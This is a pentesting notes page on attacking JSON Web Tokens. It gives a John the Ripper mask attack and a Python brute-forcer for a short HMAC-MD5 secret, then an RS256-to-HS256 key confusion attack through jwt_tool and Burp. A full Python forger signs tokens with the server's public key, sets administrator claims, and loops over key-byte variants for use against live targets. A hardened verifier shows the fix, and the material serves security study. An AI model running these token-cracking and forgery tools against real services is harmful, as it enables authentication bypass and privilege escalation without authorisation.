# JWT

## MD5\_HMAC

The header of this token decodes to `{"alg":"MD5_HMAC"}`, a non-standard algorithm name, and the signature is an HMAC-MD5 over `header.payload`. The secret is short and its fixed prefix `fsrwjcfszeg` is already known, so only the last five lowercase letters have to be brute-forced offline, in either of two ways.

* Easy way: John the Ripper. `jwt.txt` holds the token in John's HMAC input format, `header.payload#<signature as hex>`; the mask keeps the known prefix and brute-forces the five unknown lowercase letters (`?l`).

```
john --mask=fsrwjcfszeg?l?l?l?l?l --format=HMAC-MD5 jwt.txt
```
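The token has to be converted into John's HMAC input line before the command above will run. The helper below is an added example, not from the page: it decodes the header to pick the matching John format name and emits `header.payload#<hex signature>`. The alg-to-format table is my assumption based on John's HMAC format names and also covers the standard HS256/384/512 tokens, not just the `MD5_HMAC` one on this page; the token used is the one from this page.

```python
import base64
import json

# John's HMAC formats take one line per hash: "<message>#<hex digest>". For a JWT the
# message is "header.payload" and the digest is the base64url-decoded signature.
# Mapping assumed from John's format names; MD5_HMAC is the non-standard alg on this page.
JOHN_FORMATS = {
    "HS256": "HMAC-SHA256",
    "HS384": "HMAC-SHA384",
    "HS512": "HMAC-SHA512",
    "MD5_HMAC": "HMAC-MD5",
}


def b64url_decode(text: str) -> bytes:
    # JWT parts drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_to_john(token: str) -> tuple:
    """Return (john_hash_line, john_format_name) for an HMAC-signed JWT."""
    header_b64, payload_b64, sig_b64 = token.strip().split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg")
    if alg not in JOHN_FORMATS:
        raise ValueError(f"{alg!r} is not an HMAC algorithm John can crack this way")
    line = f"{header_b64}.{payload_b64}#{b64url_decode(sig_b64).hex()}"
    return line, JOHN_FORMATS[alg]


if __name__ == "__main__":
    # The token from this page.
    token = "eyJhbGciOiJNRDVfSE1BQyJ9.eyJ1c2VybmFtZSI6InMifQ.49BQc1Pj96LW8tUhAHXzYA"
    line, fmt = jwt_to_john(token)
    with open("jwt.txt", "w") as f:
        f.write(line + "\n")
    print(f"john --mask=fsrwjcfszeg?l?l?l?l?l --format={fmt} jwt.txt")
```

Run it once to write `jwt.txt`, then paste the printed john command. If the header's `alg` is not in the table (for example `RS256`), the function refuses, because there is no symmetric secret to crack.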

* Hard way: the same brute force by hand in Python. For every candidate secret it rebuilds the token and compares it with the original; the commented block writes the candidate list with the same keyspace as the john mask above.

```python
import base64
import hashlib
import hmac


def remove_padding(encoded_string):
    # JWT parts are base64url without '=' padding
    return encoded_string.rstrip("=")


def jwt_creator(secret_key):
    # Header {"alg":"MD5_HMAC"} and payload {"username":"s"}, already base64url-encoded
    encoded_header = 'eyJhbGciOiJNRDVfSE1BQyJ9'
    encoded_payload = 'eyJ1c2VybmFtZSI6InMifQ'

    encoded_token = encoded_header + "." + encoded_payload

    # The signature is HMAC-MD5 over "header.payload" keyed with the candidate secret
    signature = hmac.new(secret_key.encode("utf-8"), encoded_token.encode("utf-8"), hashlib.md5).digest()
    encoded_signature = remove_padding(base64.urlsafe_b64encode(signature).decode("utf-8"))

    jwt_token = encoded_token + "." + encoded_signature

    return jwt_token


original_jwt = 'eyJhbGciOiJNRDVfSE1BQyJ9.eyJ1c2VybmFtZSI6InMifQ.49BQc1Pj96LW8tUhAHXzYA'

permutations_file = 'permutations.txt'
secret_found = None


### Code to generate the permutations ###
# Same keyspace as the john mask: known prefix plus five lowercase letters (26^5 candidates)
#import itertools
#characters = 'abcdefghijklmnopqrstuvwxyz'
#permutations = itertools.product(characters, repeat=5)

#with open('permutations.txt', 'w') as file:
#    for perm in permutations:
#        line = 'fsrwjcfszeg' + ''.join(perm) + '\n'
#        file.write(line)
##########################################
with open(permutations_file, 'r') as f:
    for line in f:
        secret_key = line.strip()
        token = jwt_creator(secret_key)
        # print(token)  # uncomment to trace candidates; printing ~12 million lines dominates the runtime
        if token == original_jwt:
            secret_found = secret_key
            break

if secret_found:
    print("Found secret: " + secret_found)
else:
    print("No matching secret found.")
```

## Key Confusion attack

Also called algorithm confusion (RS256 to HS256). A vulnerable verifier lets the token's own `alg` header choose the algorithm and passes the same key material to whichever algorithm is selected. The server is configured with its RSA public key for RS256, so when an attacker sets `alg` to `HS256` the library treats that public key as the HMAC secret; because the public key is public, the attacker can sign arbitrary tokens with it.

### [jwt_tool.py](https://github.com/ticarpi/jwt_tool)

Get the server's RSA public key as PEM. If you have its JWKS (fetched from whatever JWKS endpoint the server exposes), `-jw` parses the file and writes each key out as `kid_<kid>_<timestamp>.pem` (the `kid_0_1694791448.pem` used below is one such file); if you already have the PEM, pass it with `-pk`. `-X k` runs the key confusion exploit against the token and `-V` verifies the token against the key:

{% code overflow="wrap" %}

```
python3 jwt_tool.py JWT_TOKEN -X k -jw jwks.json -V
# OR
python3 jwt_tool.py JWT_TOKEN -X k -pk public.pem -V
```

{% endcode %}

Base64-encode the public key. The server uses the exact bytes of its PEM as the HMAC secret, so encode the file as-is, trailing newline included, rather than retyping it (`c` at the end is presumably the author's clipboard alias; drop it or substitute your own, e.g. `xclip -selection clipboard`).

```
cat kid_0_1694791448.pem | base64 -w 0 | c
```

Now create a new symmetric key in Burp's JWT Editor extension (JWT Editor Keys tab, New Symmetric Key, Generate), then replace the generated `k` value with the base64 string from the previous step and save the key. The PortSwigger write-up in the references below documents the same steps.

<figure><img src="https://1504879363-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F40QKoxlr9Mj1ke1fMHsL%2Fuploads%2FzFBsIyjmkcBpf5H31kvx%2Fimage.png?alt=media&#x26;token=f96bb186-7133-41a0-8614-5624c366b0cf" alt=""><figcaption></figcaption></figure>

Now, in Repeater's JSON Web Token tab, click Sign and select the symmetric key you just created.

<figure><img src="https://1504879363-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F40QKoxlr9Mj1ke1fMHsL%2Fuploads%2Fgkat5Z13Hr4CP5HaaWZe%2Fimage.png?alt=media&#x26;token=1f5bdd53-e231-4bb1-8bcf-31f3077c98b0" alt=""><figcaption></figcaption></figure>

Finally change the algorithm in the `alg` header to `HS256` and change the body to your needs. The signature covers header and payload, so re-sign (Sign, same symmetric key) after every edit and make sure `alg` is still `HS256` afterwards. If the server rejects the result, the key bytes most likely differ from the ones the server holds (trailing newline, CRLF line endings, or a different PEM encoding of the same key such as `BEGIN PUBLIC KEY` versus `BEGIN RSA PUBLIC KEY`); regenerate `k` from the variant and try again.

<figure><img src="https://1504879363-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F40QKoxlr9Mj1ke1fMHsL%2Fuploads%2Fc7k7OsmDMJvvHH1LxL3s%2Fimage.png?alt=media&#x26;token=a17935d6-7b5e-4f31-aecd-21dd6b5684fd" alt=""><figcaption></figcaption></figure>
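The whole chain in Python, as an added example that is not part of this page, jwt_tool or Burp: forging the HS256 token from the PEM bytes, a model of the vulnerable verifier that accepts it, and a hardened verifier with the two fixes (a server-side algorithm allow-list, and an HMAC branch that refuses PEM-shaped keys). It also generalises the key-bytes caveat above into `pem_variants`, a helper that enumerates the common byte encodings of the same PEM. The PEM, the original token and every claim value are constructed samples; only the HS256 branch of the verifiers is modelled, since that is the branch the attack exercises.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def pem_variants(pem: bytes):
    # The HMAC secret is whatever bytes the server holds, so try the usual encodings
    # of the same file: trailing LF, no trailing newline, CRLF line endings.
    body = pem.replace(b"\r\n", b"\n").rstrip(b"\n")
    yield body + b"\n"
    yield body
    yield body.replace(b"\n", b"\r\n") + b"\r\n"


def forge_hs256(original_token: str, key_bytes: bytes, new_claims: dict) -> str:
    # Keep the original header (typ, kid, ...) so the server selects the same key,
    # switch alg to HS256 and HMAC the edited token with the public key bytes.
    header_b64, payload_b64, _old_sig = original_token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    header["alg"] = "HS256"
    payload.update(new_claims)
    signing_input = encode_part(header) + "." + encode_part(payload)
    sig = hmac.new(key_bytes, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def _verify_hs256(header_b64: str, payload_b64: str, sig_b64: str, key: bytes) -> dict:
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))


def vulnerable_decode(token: str, key: bytes) -> dict:
    # The weak pattern: the token's own `alg` selects the algorithm and the single
    # `key` argument (here the RSA public key PEM) is reused for whatever it selects.
    # Only the HS256 branch is modelled, because that is the branch the attack hits.
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg")
    if alg != "HS256":
        raise ValueError("only HS256 is modelled in this example")
    return _verify_hs256(header_b64, payload_b64, sig_b64, key)


def hardened_decode(token: str, key: bytes, allowed_algs=frozenset({"RS256"})) -> dict:
    # Fix 1: the server, not the token, decides which algorithms are acceptable.
    # Fix 2: the HMAC branch refuses key material that is obviously a PEM.
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg")
    if alg not in allowed_algs:
        raise ValueError(f"alg {alg!r} rejected; server accepts {sorted(allowed_algs)}")
    if alg != "HS256":
        raise ValueError("only HS256 is modelled in this example")
    if key.lstrip().startswith(b"-----BEGIN"):
        raise ValueError("PEM-formatted key must not be used as an HMAC secret")
    return _verify_hs256(header_b64, payload_b64, sig_b64, key)


def accepts(decoder, token: str, key: bytes, **kwargs) -> bool:
    try:
        decoder(token, key, **kwargs)
        return True
    except ValueError:
        return False


# Constructed sample standing in for the server's RSA public key PEM. Only its exact
# bytes matter for the forgery, so the body is deliberately not a real key.
SERVER_PEM = (
    b"-----BEGIN PUBLIC KEY-----\n"
    b"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAconstructed-sample-not-a-real-key\n"
    b"-----END PUBLIC KEY-----\n"
)
# Constructed sample of a token the target issued; its RS256 signature is irrelevant
# because the forgery replaces it.
ORIGINAL_TOKEN = (
    encode_part({"kid": "0", "alg": "RS256", "typ": "JWT"}) + "."
    + encode_part({"sub": "wiener", "role": "user"}) + ".placeholder"
)


def run_demo():
    forged = forge_hs256(ORIGINAL_TOKEN, SERVER_PEM, {"sub": "administrator", "role": "admin"})
    return forged, vulnerable_decode(forged, SERVER_PEM), accepts(hardened_decode, forged, SERVER_PEM)
```

`run_demo()` returns the forged token, the claims the vulnerable verifier hands back (`sub` now `administrator`) and `False` for the hardened verifier, which rejects the token at the allow-list check before it touches any key material. The second fix matters on its own for genuine HMAC deployments: even with `HS256` allowed, `hardened_decode` refuses to HMAC with a PEM, while a real shared secret still verifies. Against a live target, loop `forge_hs256` over `pem_variants(pem)` and submit each token; only the variant whose bytes match the server's in-memory key will be accepted.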

### References:

* <https://portswigger.net/web-security/jwt/algorithm-confusion>
* <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token#jwt-signature---key-confusion-attack-rs256-to-hs256-cve-2016-5431>
